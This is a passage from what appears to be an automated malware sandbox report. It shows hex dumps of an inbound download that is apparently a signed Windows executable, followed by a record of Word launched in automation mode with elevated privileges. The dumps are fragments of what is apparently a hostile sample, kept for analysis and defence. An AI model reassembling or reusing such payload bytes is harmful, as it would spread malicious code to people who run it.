f8 b2 43 0c 6d e1 28 68 74 Data Ascii: ~f<}'!F3!4C\|/?\JlouKCbmV*7IE!Vt-9nH aX_n:w@cRh6m6l\x '<I{e`z<E05vFhAvkJL[k=~v:<()jk,%^`p+n0M?_6wjPCe,Cm(ht
2022-03-22 15:50:26 UTC	1094	IN	Data Raw: 0c 24 6e 19 0a 98 ef 20 49 53 52 2b 4f e6 b9 8a 1d e7 31 53 47 3b b7 ba 46 c5 8c 0b 36 85 c8 3f 61 77 4e 98 5a 42 63 2d 3c ea 87 80 ec 65 c5 f2 a6 b3 1a 81 5a 7b 15 72 bc 91 0e 33 87 be 11 04 1c d9 ba 90 36 a5 87 34 45 b5 82 88 40 e4 59 d1 12 74 3d ef ec 13 81 0a a7 11 cc 93 7a 6b f1 bb 90 96 4a dd 12 06 2b 2a 75 0f 12 77 64 27 39 dc 10 e9 39 53 06 72 04 43 56 cf a3 8b 3b 17 c4 da 25 1d 30 10 6d ab f5 2f 03 c8 58 06 99 9c e9 ad 59 e4 99 94 34 1d b1 4f 51 bd 68 92 d5 bf ae be 95 42 1f c2 65 05 ef 0a f7 4e ef 3d 20 26 c1 5f 2d 04 1a a7 30 f9 65 e4 2a b9 1d 81 1b 20 78 9b a4 a5 15 58 bf 69 03 9a 00 5d c7 c7 1f c2 56 16 df 63 a9 91 7a f9 18 d8 f8 11 55 32 e0 3b 24 16 68 e5 91 ea 8d d9 08 3b 4a e0 38 8b e6 f3 cf 06 15 24 2a 9a 58 f0 26 4a 3b 76 b4 3c ed a4 82 Data Ascii: $n ISR+O1SG;F6?awNZBc-<eZ{r364E@Yt=zkJ+uwd'99SrCV;%0m/XY4OQhBeN= &_-0e xXi]VczU2;$h;J8$*X&J;v<
2022-03-22 15:50:26 UTC	1102	IN	Data Raw: 80 75 29 fa 15 94 a2 02 d7 cb 8c 41 b5 db 49 aa 0b 6a b6 2d 31 61 c6 96 b5 f4 a5 8e a2 62 29 5f d1 2c b4 8e f3 db 0a 5e 6a 74 b0 8b a0 37 bc 21 20 00 14 b1 50 4a 09 6d 0b d7 fa 02 06 70 6f 4a 0c 16 27 ea 96 8a 10 94 60 82 13 68 d5 d0 2d cd f5 8a df 02 5c 5e ea e1 56 f3 47 37 c1 c4 1c b6 81 ab 3c 04 42 e8 82 49 3d 8d d2 3a 59 54 01 e3 0a db 64 53 28 26 2d ae 2c c0 76 58 e4 2c c3 06 82 10 29 c0 5e cb ec 34 0a 00 66 b1 33 a6 20 77 d4 fd 40 0b 88 c3 ec 4b 83 11 8a 06 45 92 d6 d8 a9 55 2b 90 32 f4 d5 48 15 68 d7 74 57 b6 4a 70 cf d8 7d 88 28 fb de d0 9e 85 ab dd c5 a9 9d de 80 85 b0 be bd 0a 34 4b b7 ae f5 5d 12 3f 95 8e 11 29 1f bd 5d 2b d7 41 f6 19 ff 02 97 0e 84 6c 38 2d 07 98 2b bc 51 9b b7 9a a4 20 16 fd 86 04 17 c0 89 84 92 14 a3 6f 14 cf 6d df cf 3c 2f Data Ascii: u)AIj-1ab)_,^jt7! PJmpoJ'`h-\^VG7<BI=:YTdS(&-,vX,)^4f3 w@KEU+2HhtWJp}(4K]?)]+Al8-+Q om</
2022-03-22 15:50:26 UTC	1109	IN	Data Raw: ab 6f 84 01 f3 18 fd fc 7b 82 28 13 fd 3f 3a 5c f0 36 60 86 1a 86 89 9d 21 3d 00 8d ec 29 c4 9a d2 49 75 5a 3f 01 60 e2 4f 32 70 d4 3e c9 fb 9f 5f fb 4e 57 43 b6 0b 33 02 30 89 2d 4d b6 4e 57 19 fa d9 f3 ee 23 18 13 5a 47 63 27 30 9c 65 ad 33 e6 70 9b e5 fa cb 36 13 ef c4 a9 18 44 92 fd 50 c2 2b 44 9f 74 06 6d 04 63 b5 84 2d 85 d7 9f dc 64 bf ce 82 da a7 3c f2 0d d0 77 70 6a fe 90 e3 f7 70 d2 df ea 64 24 86 4a b1 b6 9f af f9 23 ef ce ec dc 63 21 67 12 b3 43 84 7d d0 4c 70 05 41 05 f1 4c 1c 26 83 03 34 b9 6d d5 ee 28 31 30 db 57 da ca dd 79 64 26 12 16 61 b7 3f 6e 8e dd 25 96 d0 1e 8b b8 e4 b4 80 c3 bf 67 49 af 2f 0d cb ff 9d e9 b5 e1 92 23 94 4c 85 1b 51 49 f6 4c d0 12 3e eb 49 b0 07 9e 69 7c f1 96 50 ff b1 01 64 33 5e 97 72 62 86 a9 75 cd 83 d3 f3 48 56 Data Ascii: o{(?:\6`!=)IuZ?`O2p>_NWC30-MNW#ZGc'0e3p6DP+Dtmc-d<wpjpd$J#c!gC}LpAL&4m(10Wyd&a?n%gI/#LQIL>Ii\|Pd3^rbuHV
2022-03-22 15:50:26 UTC	1117	IN	Data Raw: cb ad 14 d7 39 89 4b 82 c9 ed 99 1e 4c 94 e3 fe 88 49 d8 fb 8e e5 da 95 57 e4 84 2e ad 7a 9a 21 38 b6 20 8c d1 e2 6f 99 8c b1 8e df f1 b3 86 3a 41 26 d8 51 66 7a 01 bc 80 2f f9 c7 8b 3e 4c 79 70 c2 d7 9d af 5a 54 3e 1b 8b 6b 37 0d 57 6c a6 a9 50 d4 ca 3c b2 d4 65 8b 52 39 c2 92 7b 57 f6 95 a7 02 81 c7 d6 d2 9b 8e 56 b9 48 58 cd 28 39 41 63 4e 66 6e a5 b4 7b 9a bc 4f 8f dc a0 29 61 13 ca 8b d1 ac 8f a9 62 db a1 fb 3f 6e ff b3 bc e6 1e 3d dc 97 e2 1c 0a 4f 25 a5 1c 5d 6e 63 74 77 87 7a 38 36 e3 56 62 d1 71 3e 05 35 d3 d0 3a ed ee ba a9 79 eb 96 09 6c b6 24 f5 7a 81 56 ca 9d eb 53 e6 8a d8 e9 bc 84 d0 fd 86 68 bf f2 3b bb fd e7 74 dd dc f7 19 1d 76 4a 97 3e 3e f9 b6 8e 81 ea e7 b1 fe d5 df cf ea 55 46 de 1a 34 d1 70 3d f0 ff e2 73 08 be 20 9c 43 8a 57 d5 e4 Data Ascii: 9KLIW.z!8 o:A&Qfz/>LypZT>k7WlP<eR9{WVHX(9AcNfn{O)ab?n=O%]nctwz86Vbq>5:yl$zVSh;tvJ>>UF4p=s CW
2022-03-22 15:50:26 UTC	1125	IN	Data Raw: 85 d0 46 6e 57 bd 34 5d a1 6f cf 57 da 01 63 4b 85 33 26 9a ef 22 ee 14 86 34 8e 90 2b 20 8a 31 c8 a4 38 66 7f be c6 58 e3 c9 67 e1 3f ce ca 65 53 77 97 c2 98 48 59 61 75 d8 51 ac 09 da 78 41 e7 64 c8 09 fe b4 9d f8 64 dd 95 2d bb 83 f0 93 46 aa 57 ef 3c e1 68 b3 25 96 9c 03 06 10 a7 45 d4 b9 0c 0e 17 52 e5 a8 7e 8e a9 ef d5 81 5c d9 5a 9d 24 33 a1 83 7c c8 0d cf 12 b9 58 e5 14 cf 13 68 a5 cb 86 b1 1a fa 91 e6 7c 80 2e e6 6e 00 d9 a9 ec 9b 3e 48 33 45 08 76 b2 79 06 cd 41 46 82 f0 a0 3b ff ab 3a ae 4f 1f 24 b1 e0 14 d6 22 39 7e 21 8c 29 19 2d ba 16 62 62 eb 24 13 53 f8 e4 9f 85 e6 95 7d 51 49 c6 33 e2 23 59 81 98 bc ee 28 ad 10 84 a8 85 d6 0d 8e 7b 3b cb a5 0f 02 23 32 50 d1 24 8d a4 57 9e 66 d2 9a 9a ce 60 b6 ab f6 21 d6 d4 84 43 87 56 fd 90 31 fb 49 cd Data Ascii: FnW4]oWcK3&"4+ 18fXg?eSwHYauQxAdd-FW<h%ER~\Z$3\|Xh\|.n>H3EvyAF;:O$"9~!)-bb$S}QI3#Y({;#2P$Wf`!CV1I
2022-03-22 15:50:26 UTC	1133	IN	Data Raw: 60 78 a7 97 44 d0 0f 8d 31 53 f2 0d f0 1e eb 24 53 e6 5e b7 e1 dd 5f 21 89 57 93 7b e4 87 25 83 8f 58 3a 06 11 59 e5 71 4d 6b d9 f6 07 c6 f5 94 5c 93 f3 bb 31 15 19 44 e2 3d 45 a5 91 36 a4 11 33 25 94 48 d9 6a 0b c2 f3 0b a5 c7 35 01 e4 99 ea f6 65 5c 7f 62 50 3a 7e d9 4e 8b c4 a3 f3 6d f9 ba 47 07 3c b5 f2 b2 4e 60 b8 af 2e f6 29 e7 8f 37 46 5d 8c c0 60 21 ca dc 4c 42 cf 00 a9 1e ca d6 a8 b7 19 a4 9c ec 84 c7 c8 15 0e 78 67 81 08 16 02 93 98 80 f1 05 b3 56 d3 55 3a 48 ad 93 2f 4f 30 ac b1 2d 4b b8 47 52 05 f1 5f 37 83 5a a0 71 e7 6d 96 c2 01 87 f1 47 0e ce 79 af 7a d7 78 7b 0c 74 b1 5c bf 12 b6 b9 54 80 c9 c6 fc ca 58 2d 5e 3c d2 56 09 f5 80 95 31 05 b1 8b 83 40 a6 8d 86 52 ad 9e e3 00 59 3f 79 b4 7d 98 b9 de 4b b8 06 c4 b7 79 61 a2 c6 f7 62 5b 91 6e 23 Data Ascii: `xD1S$S^_!W{%X:YqMk\1D=E63%Hj5e\bP:~NmG<N`.)7F]`!LBxgVU:H/O0-KGR_7ZqmGyzx{t\TX-^<V1@RY?y}Kyab[n#
2022-03-22 15:50:26 UTC	1141	IN	Data Raw: 3c c3 e6 fa 12 06 1a 11 94 6b c1 16 47 07 04 67 e8 f0 d9 d1 74 6b 34 02 c6 9e 9f 00 fa f5 4c af 5a 0c a7 d5 6a 95 66 da b3 1f b6 6e b2 e6 a3 ab 9b c5 df f6 dc 4a fc 1c 82 9a 66 5f c9 48 e5 db 6c 44 5e 46 f7 23 39 01 d4 4b 0e a3 c7 c9 dc fb 62 b3 de aa 66 bb b9 42 e9 6a 56 46 ba 29 58 46 34 fd 4a 2b ab 76 1d 63 55 79 62 97 f0 ae 8b bb 06 07 58 8a f8 99 e6 21 5a 29 d4 60 df cb 7a c8 22 e0 f4 ae 67 68 a9 23 4d 94 a5 30 39 c8 52 16 33 53 56 b7 30 26 1f 4c 8e 08 b4 05 2f 14 4e eb 7e 80 d3 ba a8 e5 12 43 9f 08 c7 a3 78 ee 9f 78 e2 5a ce c6 e7 65 96 9c 51 73 4b c9 50 58 93 5f 08 46 34 12 e8 6e 67 2a 58 f7 dd d8 25 08 cc 8a 6e e9 25 af 5a 62 93 2a 60 9c bc 1f 03 36 4c be 9d d8 de 1c 25 6f 4a a4 20 fc ec 3d a3 35 2d 78 1a 66 11 ad 17 15 58 37 b0 7f 17 b6 a9 71 ba Data Ascii: <kGgtk4LZjfnJf_HlD^F#9KbfBjVF)XF4J+vcUybX!Z)`z"gh#M09R3SV0&L/N~CxxZeQsKPX_F4ngX%n%Zb`6L%oJ =5-xfX7q
2022-03-22 15:50:26 UTC	1148	IN	Data Raw: e9 05 90 a0 b0 2b 80 e8 95 88 94 ec c1 04 6c 8a 04 0d f4 58 dc 39 37 76 07 b1 7b dd c2 0b db 9f 7f f6 24 36 ee 5b 6e a3 80 23 8e d2 1c 00 62 6c 98 24 19 8c be 79 ea 3b 06 9b e2 e7 7b e6 05 7e eb 4c 70 46 53 e0 31 9d 19 57 7b 00 5b 51 11 93 20 86 b8 88 78 6d 5e 52 c0 fc 52 4b 4c 03 ea f8 7c 22 2a a0 43 82 df d4 c1 44 ba 6c e8 39 25 aa 08 82 61 78 68 48 00 c1 08 d0 77 20 ac ba 2c 98 87 0f 84 22 49 9c c4 a2 24 e5 e2 28 15 84 16 e6 89 18 09 1c d9 6c ea c6 39 5d 0a 2d 9b bd 84 9f cd f9 17 8d 7e 7f a4 3f fc d8 2f 86 d7 12 64 1b f8 fe 12 f2 e6 29 ea 75 26 ec 87 86 5a 7e e2 94 10 a0 88 ce 9c 7c 54 22 eb e2 cb 66 84 7f 2a b6 18 ca 4c 48 cf d8 b1 b8 41 34 49 0a 50 13 d2 29 29 4e 0a 3d b0 33 17 72 30 65 f6 a8 4e f6 94 ca ad 62 17 a5 ab 09 0b 95 86 9e 8a 1f d4 13 23 Data Ascii: +lX97v{$6[n#bl$y;{~LpFS1W{[Q xm^RRKL\|"CDl9%axhHw ,"I$(l9]-~?/d)u&Z~\|T"fLHA4IP))N=3r0eNb#
2022-03-22 15:50:26 UTC	1156	IN	Data Raw: 52 fd 6c 37 6a 0e 57 17 17 17 dd d4 83 6d a7 52 44 7a ed c8 2c d9 3c ab 06 30 bc fb ab 76 c3 2b 8b 3b 91 b9 e5 ab 49 65 ba 70 47 0b 3c 1c b8 37 a1 54 0f b3 0f 8f ca aa 87 a4 a9 c7 e7 65 39 13 fb a7 2f e3 4c 66 ad a3 b9 3a 40 27 59 4a 8f f8 64 1e ea 86 4f 49 d3 3b 11 4d 0d 92 7c 84 a8 33 12 d7 fc f2 eb f8 b2 f8 cd 72 5a 36 9b f9 32 21 90 f1 48 e6 00 75 e8 1b 99 bd c1 28 a5 04 8c 2b 91 24 d3 24 65 ea 02 1e ad b6 1c bb b9 0f ec 23 01 02 37 42 71 1f 32 9a 9a 8c 99 02 69 09 e0 88 b1 40 c2 bd e4 b8 d9 46 6c 4a 4b 63 92 cd 76 b3 12 9d 73 1b 75 08 ad 14 45 dd 1a fc 10 19 d7 cd 4b 62 e8 29 b2 fd fc 8e 61 0b ab 9b 8c be 1e 8a b0 29 fc 93 cb 36 c3 a8 0c 83 ff 3a fc bf 81 9e d6 0c 0d 69 30 63 c7 c3 cf 9f 7b 60 71 db dc 68 4f 01 0f 04 70 fc 86 fb a4 7d 4d 4f 73 4a 2e Data Ascii: Rl7jWmRDz,<0v+;IepG<7Te9/Lf:@'YJdOI;M\|3rZ62!Hu(+$$e#7Bq2i@FlJKcvsuEKb)a)6:i0c{`qhOp}MOsJ.
2022-03-22 15:50:26 UTC	1164	IN	Data Raw: 3c 49 0a de ce 0a 91 3a 53 ad 0a 44 da 02 70 49 06 3c 64 f1 aa df e3 ad 10 95 93 f6 13 74 51 ba 22 c3 8f e7 46 7b af 9a a2 d4 64 87 d3 f4 34 6f f2 07 20 5e 9d 93 7c 5f df 17 7d a1 fe 90 a0 5e f6 c2 ea bd e2 92 07 94 8f 1e 96 a0 44 29 49 65 17 65 f7 44 7a 2a 69 82 33 cc 77 f3 b6 f6 bd 5a c2 c3 29 d9 a2 69 ee 16 b1 53 f7 aa db 5e 6e b3 27 33 c3 02 9c 90 ab 57 ad 4f 42 c9 3c b5 d3 c0 68 28 d1 aa 3a 69 2a 8e 63 d4 e3 79 11 fc da 09 04 0a 4b a8 d1 03 ca 43 ff 6d 75 46 b0 58 ff 55 e1 7f 61 80 81 95 15 46 21 cb 79 38 b8 57 cc ac 6b 48 1a 63 c6 4f 1e c0 5a 2c 62 b8 d5 1f 2e a6 44 4c 4a 49 aa c1 28 c4 91 8b 64 c9 2a 03 e7 72 ce c0 10 93 b2 a5 59 44 1d 3a dd c7 4f 96 c1 91 02 f6 aa 5d e7 f8 94 02 82 c7 30 e1 13 d2 1d 8e cb fd cf 0f c0 55 e0 2f 78 d2 49 64 4a 9f 41 Data Ascii: <I:SDpI<dtQ"F{d4o ^\|_}^D)IeeDzi3wZ)iS^n'3WOB<h(:icyKCmuFXUaF!y8WkHcOZ,b.DLJI(d*rYD:O]0U/xIdJA
2022-03-22 15:50:26 UTC	1172	IN	Data Raw: 94 e8 fe 2c 47 5e f7 5f 5c 7c 47 1f a7 eb b5 e4 33 ff de b3 5a ba 50 fe 4b be 6d 35 93 52 58 a8 9c f3 4c e2 f8 a8 1b ea e2 df 75 4c 6a 8f ee ff 34 aa 38 3b 3c 13 6a f9 22 80 1a 5e 69 8f 93 f3 ae 77 f6 d5 f4 fe 09 73 72 fa ef f9 9c be 9d d7 6b ee 3a 87 68 63 7d 7c 34 c7 d4 93 dc 51 4b 75 33 5f 4f 3c d1 9c ca e9 74 a0 4b c8 ee 34 e9 6d 16 cd 7a 40 fb b0 a6 e9 8b 74 1f a2 3c fc dc cd db 8f 67 85 75 af b9 e9 88 cd 99 9a c7 5b 81 d9 fa aa 97 a6 9f 9f cf 30 be 23 13 f3 92 f6 51 99 b3 8f a5 5e 75 ab b9 7f 11 c1 d2 f5 0f 45 6d df fb bb 7b 39 eb 5f 1d b0 f2 1f fb a2 df a5 10 47 d2 8f 14 70 ff cf de 3a a4 f9 f0 7f 94 9f ef e8 fa ed ec 27 aa f3 e3 41 3d e5 d1 2e e1 3c af ff 66 f5 91 63 ec e5 2c fd 47 52 0c 43 e5 eb 59 80 e5 d6 fc 76 3b 9f a3 96 da 63 aa f1 fa cc ba Data Ascii: ,G^_\\|G3ZPKm5RXLuLj48;<j"^iwsrk:hc}\|4QKu3_O<tK4mz@t<gu[0#Q^uEm{9_Gp:'A=.<fc,GRCYv;c
2022-03-22 15:50:26 UTC	1180	IN	Data Raw: ad 2f 27 36 a1 4c b4 a3 ab 02 1b 6b 13 65 a2 68 2b 50 d8 60 9b 51 26 0d d2 09 89 31 b6 77 32 39 4a 13 72 c4 6c ba c9 b1 61 36 a1 26 d2 b7 4a 91 0d b6 09 70 c2 9c ae a8 6c b7 4d 69 89 81 ba 50 cd 72 9b 42 26 47 ea 42 37 d4 6d 2a 4c 6c 0c 4d c8 13 bc 5b 1d d0 c6 db 84 98 d8 aa db 4a 1b 6f 13 bd c4 03 ae a1 9f 02 37 31 26 1a 71 26 04 09 e1 75 8b 44 63 dc 84 98 38 ac ab 7a 1b 71 13 c5 44 d1 3a 21 b8 1a 37 26 26 0d b9 09 c5 02 b9 57 62 d2 31 9b 10 13 93 ba 42 c9 0d b9 09 62 62 51 17 a1 b9 32 37 1e 26 1d 84 09 31 c2 b9 ab 54 e9 b0 4d c8 89 cf 5d 86 ec c6 dd 84 2b 11 51 28 a1 bb 4a 37 11 26 34 0c 4d a8 13 d4 bc 06 f1 0d ba 09 30 b1 38 54 21 d3 5c 37 12 4c 38 f2 26 04 44 ec d1 c0 ab 03 37 a1 4c 68 f4 0a 14 38 ed 26 c0 c4 b1 57 90 d6 ba 9b 01 26 0e d7 84 b8 e8 dd Data Ascii: /'6Lkeh+P`Q&1w29Jrla6&JplMiPrB&GB7m*LlM[Jo71&q&uDc8zqD:!7&&Wb1BbbQ27&1TM]+Q(J7&4M08T!\7L8&D7Lh8&W&
2022-03-22 15:50:26 UTC	1188	IN	Data Raw: dc 65 e3 8f 5b 99 cc 38 52 2c 3e bf 87 e3 ca ee ee fd f9 8c b7 37 5c fe 21 a7 75 fc 68 ff ab 7a 18 9e 5e 71 e7 ed 7b bc 2b de 67 ce 0b 50 26 e9 56 a2 89 49 58 b9 d8 ec 8c 0b b8 69 17 3d 61 62 8c f5 91 df 5b 6e ba 45 35 9d 5a 17 1f cf 4d bc f6 ea 69 db 75 99 ce ec ec 22 76 58 54 34 6d 73 57 79 34 1e b1 22 f2 2b 8f c2 a1 38 d4 e0 e3 56 35 93 45 0d bd 1c 2f e5 7d c1 7a 4a ca 3c 4d e3 79 37 89 3d 5e dc 1d 39 7c 09 e1 fd 9f 2a 80 c5 06 58 ce 26 d6 74 1e 9f cd 67 1d 79 1c d5 e3 3a 03 19 96 3f 14 b2 20 d6 e5 89 e8 fd 6e 2e ca 70 45 bc cc 30 ec 11 3b a1 80 3f f2 4f 44 9c 65 db cd b9 5d d8 13 c6 a9 3a 59 e5 5b c8 56 8a 7b b4 ea b6 5c f6 25 49 3e da 40 1f f3 76 9e bb 9c 47 72 6a c4 59 fe 20 1b dc 2c e5 92 7f 6d 1a d0 d1 c1 fc 70 e5 a2 6f 9a a7 f3 59 c6 94 c5 e2 f8 Data Ascii: e[8R,>7\!uhz^q{+gP&VIXi=ab[nE5ZMiu"vXT4msWy4"+8V5E/}zJ<My7=^9\|*X&tgy:? n.pE0;?ODe]:Y[V{\%I>@vGrjY ,mpoY
2022-03-22 15:50:26 UTC	1195	IN	Data Raw: 62 c9 ab 49 35 1c 3a 62 74 74 b6 1d a9 ba af ca e7 ae bb da 27 f0 f6 55 8d 8d 3b 5e 6c f3 90 68 63 6a bc 0a 02 e0 2a 99 50 0e c4 7d ea e9 49 a8 a8 59 50 45 1d 43 c5 cc 39 03 6d 0c a1 1a b2 b5 71 1b 19 d7 90 5d e9 ad 09 18 c8 a6 db 53 c5 d7 da 13 71 13 4d 14 6b 50 5c 13 0b 61 f0 07 ba 4d 91 df 6b 5c d0 b3 56 b8 86 6e ac 71 c9 ef 0f 47 04 42 6b 89 1e 72 c2 f8 89 12 1a 72 af f6 c9 5e 4e 1a fe 5d aa 49 f5 5c eb 53 4f b0 77 1a d1 4c 95 9b 38 0a 8b 43 aa 91 f5 c4 a2 0a d4 48 a4 3c 9c f2 4a e0 1a d4 46 57 11 c0 24 1c d9 68 3a 42 1a 36 46 44 f8 04 3d 78 23 72 3b e4 bc 82 3d 56 b1 6a 44 ca da 11 22 43 cd 33 0f c0 9e ed b8 00 5f 0a 10 ad e7 43 8f 20 13 01 1e 47 8d 4e 02 a0 e5 dd 76 55 b5 7f bd 52 9d 08 aa f3 bc 10 36 73 6e f8 3d f6 2f 69 3c 95 c3 04 2e ea ca e0 a1 Data Ascii: bI5:btt'U;^lhcj*P}IYPEC9mq]SqMkP\aMk\VnqGBkrr^N]I\SOwL8CH<JFW$h:B6FD=x#r;=VjD"C3_C GNvUR6sn=/i<.
2022-03-22 15:50:26 UTC	1203	IN	Data Raw: d9 e6 b1 e8 59 ca fe 77 0d 46 e9 21 b7 d9 a9 a3 30 63 5d 87 f5 a8 0b 4b c0 e8 08 69 c6 84 8c 48 65 17 d2 47 77 b3 1b 6a 36 a1 a0 2c e9 f1 1e 75 f5 31 68 10 73 c0 71 8e 82 3f 59 09 7b 9e 96 b3 94 da 5d 57 ec b8 f1 c5 2a 94 dc 80 b2 33 86 45 ee 67 a0 3f fc 29 c3 19 23 ea 35 34 24 e7 fb 78 fb 51 86 e2 b1 98 88 95 75 91 f6 24 93 8a ac ba 6c 04 65 66 b2 cc 34 79 75 40 92 ff 87 b1 30 96 79 ca f2 8e 72 16 2f ae 71 ea 87 ed ac 11 73 2e d4 92 f9 68 b5 85 27 52 d3 60 ee fa 7f 7f d2 f1 d9 26 c6 9a 79 67 fd f5 fa 6e fe 3e b2 fb e8 df 1f 61 a6 25 91 a8 62 10 cc 32 a4 55 81 88 24 60 90 13 c0 af da 37 c0 62 b3 82 ed 92 8a cb 88 71 25 f3 00 47 0b 99 23 d5 b3 92 f3 84 c8 32 97 57 61 23 98 90 7b a6 1a 49 f5 03 86 97 d7 ba ec 31 e6 e7 45 d0 79 00 74 08 73 c0 58 6b a2 af 83 Data Ascii: YwF!0c]KiHeGwj6,u1hsq?Y{]W*3Eg?)#54$xQu$lef4yu@0yr/qs.h'R`&ygn>a%b2U$`7bq%G#2Wa#{I1EytsXk
2022-03-22 15:50:26 UTC	1211	IN	Data Raw: 00 3e 9c 00 00 26 4c 00 00 06 2c 00 00 0d 0c 00 00 19 fc 00 00 00 00 00 00 80 79 00 00 00 30 00 00 00 00 00 00 80 01 00 00 80 03 00 00 80 07 00 00 80 03 00 00 80 01 00 00 80 00 00 00 c0 00 00 00 80 01 00 00 00 01 00 00 10 01 00 00 a0 01 00 00 c0 01 00 00 e6 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 01 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 7f ff c0 00 7f e1 e0 00 7f ff f0 00 7f ff f0 30 20 00 f0 78 0f ff 70 f0 0f ff 81 e0 08 03 83 c0 08 03 87 80 08 43 8f 00 08 23 9e 00 08 1b 3c 00 08 0c 78 00 08 04 f0 00 0f f9 ef f8 07 c3 dc 3c 00 27 a7 fe 00 0f 7b fe 00 1e 00 1e 00 3d bf ee 07 f8 df f0 0f f1 60 70 1f e1 30 70 19 f1 08 70 10 f1 04 70 00 e1 00 70 00 e1 00 70 01 c1 00 70 03 01 Data Ascii: >&L,y0( @0 xpC#<x<'{=`p0pppppp
2022-03-22 15:50:26 UTC	1219	IN	Data Raw: 0a 20 20 20 20 20 20 20 3c 2f 64 70 69 41 77 61 72 65 6e 65 73 73 3e 0a 20 20 20 20 20 3c 2f 61 73 6d 76 33 3a 77 69 6e 64 6f 77 73 53 65 74 74 69 6e 67 73 3e 0a 20 20 20 3c 2f 61 73 6d 76 33 3a 61 70 70 6c 69 63 61 74 69 6f 6e 3e 0a 3c 2f 61 73 73 65 6d 62 6c 79 3e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: </dpiAwareness> </asmv3:windowsSettings> </asmv3:application></assembly>
2022-03-22 15:50:26 UTC	1227	IN	Data Raw: 0e 65 4f 6c 87 87 5e f3 6e a0 f9 75 a5 9b 40 e8 53 b2 27 9d 4a b9 c0 77 21 8d ff 87 f2 de bc 8c ef 17 df b7 49 0b d1 f2 6e 30 0b 1a 0e 4e 76 ed 11 fc f5 e9 56 b2 7d bf c7 6d 0a 93 8c a5 d0 c0 b6 1d be 3a 4e 94 a2 d7 6e 6c 0b c2 8a 7c fa 20 f3 c4 e4 e5 cd 0d a8 cb 91 92 b1 7c 85 ec b5 14 69 66 0e 82 e7 cd ce c8 2d a6 51 7f 21 c1 35 53 85 06 4a 5d 9f ad bb 1b 5f 74 30 82 05 e0 30 82 03 c8 a0 03 02 01 02 02 10 2e 7c 87 cc 0e 93 4a 52 fe 94 fd 1c b7 cd 34 af 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 30 81 85 31 0b 30 09 06 03 55 04 06 13 02 47 42 31 1b 30 19 06 03 55 04 08 13 12 47 72 65 61 74 65 72 20 4d 61 6e 63 68 65 73 74 65 72 31 10 30 0e 06 03 55 04 07 13 07 53 61 6c 66 6f 72 64 31 1a 30 18 06 03 55 04 0a 13 11 43 4f 4d 4f 44 4f 20 43 41 20 4c 69 6d Data Ascii: eOl^nu@S'Jw!In0NvV}m:Nnl\| \|if-Q!5SJ]_t00.\|JR40*H010UGB10UGreater Manchester10USalford10UCOMODO CA Lim
2022-03-22 15:50:26 UTC	1234	IN	Data Raw: 31 61 a9 45 79 8c 04 4e 62 a3 82 8a 0f 91 4b 2c 3d cb d2 d4 ca 15 72 b4 39 63 30 82 25 85 06 0a 2b 06 01 04 01 82 37 02 04 01 31 82 25 75 30 82 25 71 06 09 2a 86 48 86 f7 0d 01 07 02 a0 82 25 62 30 82 25 5e 02 01 01 31 0f 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 30 78 06 0a 2b 06 01 04 01 82 37 02 01 04 a0 6a 30 68 30 33 06 0a 2b 06 01 04 01 82 37 02 01 0f 30 25 03 01 00 a0 20 a2 1e 80 1c 00 3c 00 3c 00 3c 00 4f 00 62 00 73 00 6f 00 6c 00 65 00 74 00 65 00 3e 00 3e 00 3e 30 31 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20 98 88 ab 0a 03 49 0b d9 83 0a d4 9f 7d fa 96 48 30 a5 1e 10 95 5c e9 c1 a8 fc 52 0a 38 1a ff 7a a0 82 1e bd 30 82 05 d8 30 82 03 c0 a0 03 02 01 02 02 10 4c aa f9 ca db 63 6f e0 1f f7 4e d8 5b 03 86 9d 30 0d 06 09 2a 86 48 86 f7 Data Ascii: 1aEyNbK,=r9c0%+71%u0%qH%b0%^10`He0x+7j0h03+70% <<<Obsolete>>>010`He I}H0\R8z00LcoN[0H
2022-03-22 15:50:26 UTC	1242	IN	Data Raw: 2f b9 ee fa 2f f1 f1 8f fe 50 b8 78 dd 14 96 de 1c 0e 70 b0 2a 85 6a b1 6c 68 e9 2a e4 10 2b 6e 21 fd d3 7c 9d 37 e4 2a 06 d6 c3 f1 d7 68 e3 4f 07 79 81 08 13 fe b2 64 5e e9 b1 3c e6 d0 78 23 b2 09 2c e2 26 62 bf 3b a9 97 51 cc c7 44 32 81 b2 af cf df 31 82 06 0b 30 82 06 07 02 01 01 30 81 91 30 7d 31 0b 30 09 06 03 55 04 06 13 02 47 42 31 1b 30 19 06 03 55 04 08 13 12 47 72 65 61 74 65 72 20 4d 61 6e 63 68 65 73 74 65 72 31 10 30 0e 06 03 55 04 07 13 07 53 61 6c 66 6f 72 64 31 1a 30 18 06 03 55 04 0a 13 11 43 4f 4d 4f 44 4f 20 43 41 20 4c 69 6d 69 74 65 64 31 23 30 21 06 03 55 04 03 13 1a 43 4f 4d 4f 44 4f 20 52 53 41 20 43 6f 64 65 20 53 69 67 6e 69 6e 67 20 43 41 02 10 7c 11 18 cb ba dc 95 da 37 52 c4 6e 47 a2 74 38 30 0d 06 09 60 86 48 01 65 03 04 02 Data Ascii: //Pxpjlh+n!\|7*hOyd^<x#,&b;QD21000}10UGB10UGreater Manchester10USalford10UCOMODO CA Limited1#0!UCOMODO RSA Code Signing CA\|7RnGt80`He

Target ID:	0
Start time:	16:50:49
Start date:	22/03/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f310000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
